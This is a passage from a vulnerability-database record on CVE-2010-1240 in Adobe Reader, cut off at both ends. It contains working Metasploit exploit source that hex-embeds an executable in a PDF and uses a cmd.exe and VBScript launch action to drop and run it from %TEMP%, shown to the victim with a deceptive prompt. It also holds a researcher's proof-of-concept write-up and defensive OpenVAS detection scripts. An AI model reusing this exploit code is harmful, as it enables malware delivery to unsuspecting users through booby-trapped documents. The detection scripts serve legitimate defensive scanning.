\"startxref\\r\\n#{stream.length + pdf_payload.length + new_names.length + new_page.length + new_catalog.length}\\r\\n%%EOF\\r\\n\"\n\n\n else\n pdf_payload = String.new()\n num = trailers[0].fetch(\"Size\").to_i + 1\n pdf_payload << \"#{trailers[0].fetch(\"Size\")} 0 obj\\r<</EmbeddedFiles #{num} 0 R>>\\rendobj\\r\"\n pdf_payload << \"#{num} 0 obj\\r<</Names[(#{pdf_name})#{num + 1} 0 R]>>\\rendobj\\r\"\n pdf_payload << ef_payload(pdf_name,exe_name,num)\n pdf_payload << js_payload(pdf_name,num)\n new_pdf << stream << pdf_payload\n xrefs = xref_create(new_pdf,stream.length,\"*\")\n\n new_size = trailers[0].fetch(\"Size\").to_i + 6\n\n if aa\n new_page = page.gsub(/(AA<<\\/O )\\d+ \\d(.*)/m,'\\1' + \"#{trailers[0].fetch(\"Size\").to_i + 5} 0\" + '\\2')\n else\n new_page = page.gsub(/(>> *\\r?\\n? *endobj)/m,\"/AA<<\\/O #{trailers[0].fetch(\"Size\").to_i + 5} 0 R>>\" + '\\1')\n end\n\n new_pdf << new_catalog\n xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), \"1\")\n\n new_pdf << new_page\n xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), \"1\")\n\n if trailers[0].has_key?(\"ID\")\n new_pdf << \"xref\\r\\n\" << xrefs << \"trailer\\r\\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch(\"Root\")} R/Info #{trailers[0].fetch(\"Info\")} R/ID#{trailers[0].fetch(\"ID\")}>>\\r\\n\"\n else\n new_pdf << \"xref\\r\\n\" << xrefs\n new_pdf << \"trailer\\r\\n\"\n new_pdf << \"<</Size #{new_size}/Prev #{startxref}\"\n new_pdf << \"/Root #{trailers[0].fetch(\"Root\")} R\"\n new_pdf << \"/Info #{trailers[0].fetch(\"Info\")} R>>\\r\\n\"\n end\n\n new_pdf << \"startxref\\r\\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\\r\\n%%EOF\\r\\n\"\n\n\n end\n\n\n return new_pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb"}], "exploitdb": [{"lastseen": "2016-02-02T06:15:29", "description": "Adobe PDF Escape EXE Social Engineering (No JavaScript). CVE-2010-1240. Local exploit for windows platform", "published": "2010-12-16T00:00:00", "type": "exploitdb", "title": "Adobe PDF Escape EXE Social Engineering No JavaScript", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1240"], "modified": "2010-12-16T00:00:00", "id": "EDB-ID:16682", "href": "https://www.exploit-db.com/exploits/16682/", "sourceData": "##\r\n# $Id: adobe_pdf_embedded_exe_nojs.rb 11353 2010-12-16 20:11:01Z egypt $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n#\r\n# Modified version of the Adobe PDF Embedded EXE Social Engineering \"adobe_pdf_embedded_exe.rb\".\r\n# This version does not require JavaScript to be enabled and does not required the EXE to be\r\n# attached to the PDF. The EXE is embedded in the PDF in a non-standard method using HEX\r\n# encoding.\r\n#\r\n# Lots of reused code from adobe_pdf_embedded_exe.rb and the other PDF modules to make the PDF.\r\n# Thanks to all those that wrote the code for those modules, as I probably could not have\r\n# wrote this module without borrowing code from them.\r\n#\r\n\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Adobe PDF Escape EXE Social Engineering (No JavaScript)',\r\n\t\t\t'Description' \t=> %q{\r\n\t\t\t\t\tThis module embeds a Metasploit payload into an existing PDF file in\r\n\t\t\t\ta non-standard method. The resulting PDF can be sent to a target as\r\n\t\t\t\tpart of a social engineering attack.\r\n\t\t\t},\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Author'\t =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Jeremy Conway <jeremy[at]sudosecure.net>',\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 11353 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-1240' ],\r\n\t\t\t\t\t[ 'OSVDB', '63667' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.didierstevens.com/2010/03/29/escape-from-pdf/' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t\t\t => 2048,\r\n\t\t\t\t\t'DisableNops'\t\t=> true,\r\n\t\t\t\t\t'StackAdjustment'\t=> -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Adobe Reader <= v9.3.3 (Windows XP SP3 English)', { 'Ret' => '' } ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('EXENAME', [ false, 'The Name of payload exe.', 'msf.exe']),\r\n\t\t\t\tOptString.new('FILENAME', [ false, 'The output filename.', 'evil.pdf']),\r\n\t\t\t\tOptString.new('LAUNCH_MESSAGE', [ false, 'The message to display in the File: area',\r\n\t\t\t\t\t\"To view the encrypted content please tick the \\\"Do not show this message again\\\" box and press Open.\"]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# Create the pdf\r\n\t\tprint_status(\"Making PDF\")\r\n\t\tpdf = make_pdf()\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\tdef pdf_exe(payload_exe)\r\n\r\n\t\tif !(payload_exe and payload_exe.length > 0)\r\n\t\t\tprint_status(\"Using '#{datastore['PAYLOAD']}' as payload...\")\r\n\t\t\tpayload_exe = generate_payload_exe\r\n\t\t\thex_payload = Rex::Text.to_hex(payload_exe)\r\n\t\telse\r\n\t\t\tprint_status(\"Using '#{datastore['EXENAME']}' as payload...\")\r\n\t\t\thex_payload = Rex::Text.to_hex_dump(payload_exe,16)\r\n\t\tend\r\n\r\n\t\treturn hex_payload\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\tdef make_pdf()\r\n\r\n\t\tfile_name = datastore['FILENAME']\r\n\t\texe_name = datastore['EXENAME']\r\n\t\tlaunch_msg = datastore['LAUNCH_MESSAGE']\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0d\\x0a\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpayload_exe = generate_payload_exe\r\n\t\thex_payload = Rex::Text.to_hex(payload_exe)\r\n\t\tpdf << hex_payload << eol\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/Launch/Win \") << \"<< \"\r\n\t\tpdf << \"/F (cmd.exe) /P (/C echo Set o=CreateObject^(\\\"Scripting.FileSystemObject\\\"^):Set f=o.OpenTextFile^(\\\"#{file_name}\\\",1,True^):\"\r\n\t\tpdf << \"f.SkipLine:Set w=CreateObject^(\\\"WScript.Shell\\\"^):Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\\\"%TEMP%\\\"^)+\\\"\\\\\\\\#{exe_name}\\\",2,True^):a=Split^(Trim^(Replace^(f.ReadLine,\\\"\\\\\\\\x\\\",\\\" \\\"^)^)^):\"\r\n\t\tpdf << \"for each x in a:g.Write^(Chr^(\\\"&h\\\" ^& x^)^):next:g.Close:f.Close > 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\\\\\#{exe_name} && del /F 1.vbs\"\r\n\t\tpdf << eol << eol << eol << \"#{launch_msg})\"\r\n\t\tpdf << \">>>>\" << endobj\r\n\t\txref << pdf.length\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\t\tpdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16682/"}, {"lastseen": "2016-02-01T15:27:43", "description": "Escape From PDF. CVE-2010-1239,CVE-2010-1240. Dos exploit for windows platform", "published": "2010-03-31T00:00:00", "type": "exploitdb", "title": "Escape From PDF", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1239", "CVE-2010-1240"], "modified": "2010-03-31T00:00:00", "id": "EDB-ID:11987", "href": "https://www.exploit-db.com/exploits/11987/", "sourceData": "Title\t: Escape From PDF\r\nAuthor\t: Didier Stevens\r\nDate\t: 03/29/2010\r\nSource\t: http://blog.didierstevens.com/2010/03/29/escape-from-pdf/\r\n\r\nThis is a special PDF hack: I managed to make a PoC PDF to execute an embedded executable without exploiting any vulnerability!\r\n\r\nI use a launch action triggered by the opening of my PoC PDF. With Adobe Reader, the user gets a warning asking for approval to launch the action, but I can (partially) control the message displayed by the dialog. Foxit Reader displays no warning at all, the action gets executed without user interaction.\r\n\r\nPDF viewers like Adobe Reader and Foxit Reader don\u2019t allow embedded executables (like binaries and scripts) to be extracted and executed, but I found another way to launch a command (/Launch /Action), and ultimately run an executable I embedded using a special technique. With Adobe Reader, a launch action needs to be approved by the user, but I can partially control the message displayed by the dialog box.\r\n\r\n\tExample 1:\r\n\thttp://didierstevens.files.wordpress.com/2010/03/20100329-211248.png?w=478&h=262\r\n\r\n\tExample 2:\r\n\thttp://didierstevens.files.wordpress.com/2010/03/20100329-211313.png?w=478&h=262\r\n\r\nDo you believe this could this mislead some of your users? Or maybe you can come up with a better message to fool your users.\r\n\r\nWith Foxit Reader, no warning is displayed:\r\n\r\n\tExample 3:\r\n\thttp://didierstevens.files.wordpress.com/2010/03/20100329-211310.png?w=457&h=385\r\n\r\nI\u2019m not publishing my PoC PDF yet, but you can download a PDF that will just launch cmd.exe here. Use it to test your PDF reader:\r\n\r\n\thttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11987.zip (launch-action-cmd.zip)\r\n\r\nWith Adobe Reader, the only thing preventing execution is a warning. Disabling JavaScript will not prevent this (I don\u2019t use JavaScript in my PoC PDF), and patching Adobe Reader isn\u2019t possible (I\u2019m not exploiting a vulnerability, just being creative with the PDF language specs).\r\n\r\nI shared my PoC with Adobe\u2019s PSIRT. Maybe they will come up with a solution to prevent this, should they consider that the protection offered by the warning dialog is not sufficient. BTW, preventing Adobe Reader from creating new processes blocks this trick.\r\n\r\nn this case, Foxit Reader is probably worse than Adobe Reader, because no warning gets displayed to prevent the launch action. My PoC PDF requires some changes for Foxit Reader, because ultimately, the executable doesn\u2019t run. But that\u2019s probably due to some variation in the PDF language supported by Foxit Reader.\r\n\r\nTested with Adobe Reader 9.3.1 on Windows XP SP3 and Windows 7.", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/11987/"}], "openvas": [{"lastseen": "2020-04-27T19:23:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1240", "CVE-2010-1241"], "description": "This host is installed with Adobe Reader and is prone to multiple\n vulnerabilities.", "modified": "2020-04-24T00:00:00", "published": "2010-04-07T00:00:00", "id": "OPENVAS:1361412562310801304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801304", "type": "openvas", "title": "Adobe Reader PDF Handling Multiple Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader PDF Handling Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801304\");\n script_version(\"2020-04-24T07:24:50+0000\");\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1241\");\n script_bugtraq_id(39470, 39109);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-24 07:24:50 +0000 (Fri, 24 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-04-07 16:20:50 +0200 (Wed, 07 Apr 2010)\");\n script_name(\"Adobe Reader PDF Handling Multiple Vulnerabilities (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to:\n\n - An error in custom heap management system, allows the attackers to execute\n arbitrary code via a crafted PDF document.\n\n - An error in handling of 'Launch File warning dialog' which does not restrict\n the contents of one text field allows attackers to execute arbitrary local\n program that was specified in a PDF document.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code or cause\n a denial of service via a crafted PDF document.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader version 9.3.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader version 9.3.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/16671\");\n script_xref(name:\"URL\", value:\"http://blog.didierstevens.com/2010/03/29/escape-from-pdf/\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-17.html\");\n script_xref(name:\"URL\", value:\"http://www.blackhat.com/html/bh-eu-10/bh-eu-10-briefings.html#Li\");\n script_xref(name:\"URL\", value:\"http://lists.immunitysec.com/pipermail/dailydave/2010-April/006075.html\");\n script_xref(name:\"URL\", value:\"http://lists.immunitysec.com/pipermail/dailydave/2010-April/006077.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE))\n exit(0);\n\nif(readerVer =~ \"^9\")\n{\n if(version_is_less_equal(version:readerVer, test_version:\"9.3.1\")){\n report = report_fixed_ver(installed_version:readerVer, vulnerable_range:\"Less or equal to 9.3.1\");\n security_message(port: 0, data: report);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-11T11:04:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "description": "Check for the Version of acroread", "modified": "2018-01-10T00:00:00", "published": "2010-09-10T00:00:00", "id": "OPENVAS:1361412562310850141", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850141", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:037", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:037\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Specially crafted PDF documents could crash acroread or lead to\n execution of arbitrary code CVE-2010-2862.\n\n This update also incorporate the Adobe Flash Player update APSB10-16\n for the bundled flash player parts CVE-2010-2188,\n CVE-2010-2216.\n\n Please see Adobe's site for more information:\n http://www.adobe.com/support/security/bulletins/apsb10-17.html\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850141\");\n script_version(\"$Revision: 8356 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 09:00:39 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-10 14:21:00 +0200 (Fri, 10 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-037\");\n script_cve_id(\"CVE-2010-0209\", \"CVE-2010-1240\", \"CVE-2010-2188\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2862\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:037\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.4~0.3.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.4~0.3.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:17:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "description": "Check for the Version of acroread", "modified": "2017-12-19T00:00:00", "published": "2010-09-10T00:00:00", "id": "OPENVAS:850141", "href": "http://plugins.openvas.org/nasl.php?oid=850141", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:037", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:037\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Specially crafted PDF documents could crash acroread or lead to\n execution of arbitrary code CVE-2010-2862.\n\n This update also incorporate the Adobe Flash Player update APSB10-16\n for the bundled flash player parts CVE-2010-2188,\n CVE-2010-2216.\n\n Please see Adobe's site for more information:\n http://www.adobe.com/support/security/bulletins/apsb10-17.html\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_id(850141);\n script_version(\"$Revision: 8164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 07:30:41 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-10 14:21:00 +0200 (Fri, 10 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-037\");\n script_cve_id(\"CVE-2010-0209\", \"CVE-2010-1240\", \"CVE-2010-2188\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2862\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:037\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.4~0.3.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.4~0.3.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:05:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "description": "Check for the Version of acroread", "modified": "2018-01-04T00:00:00", "published": "2010-07-12T00:00:00", "id": "OPENVAS:1361412562310850135", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850135", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:029", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:029\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Acrobat Reader was updated to version 9.3.3 to fix lots of security\n issues and bugs, several of whom could be used to execute code by\n trick the target user to open specially crafted PDFs.\n\n Adobes advisory can be found here:\n http://www.adobe.com/support/security/bulletins/apsb10-15.html\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.0, openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850135\");\n script_version(\"$Revision: 8287 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 08:28:11 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-12 11:56:20 +0200 (Mon, 12 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-029\");\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", 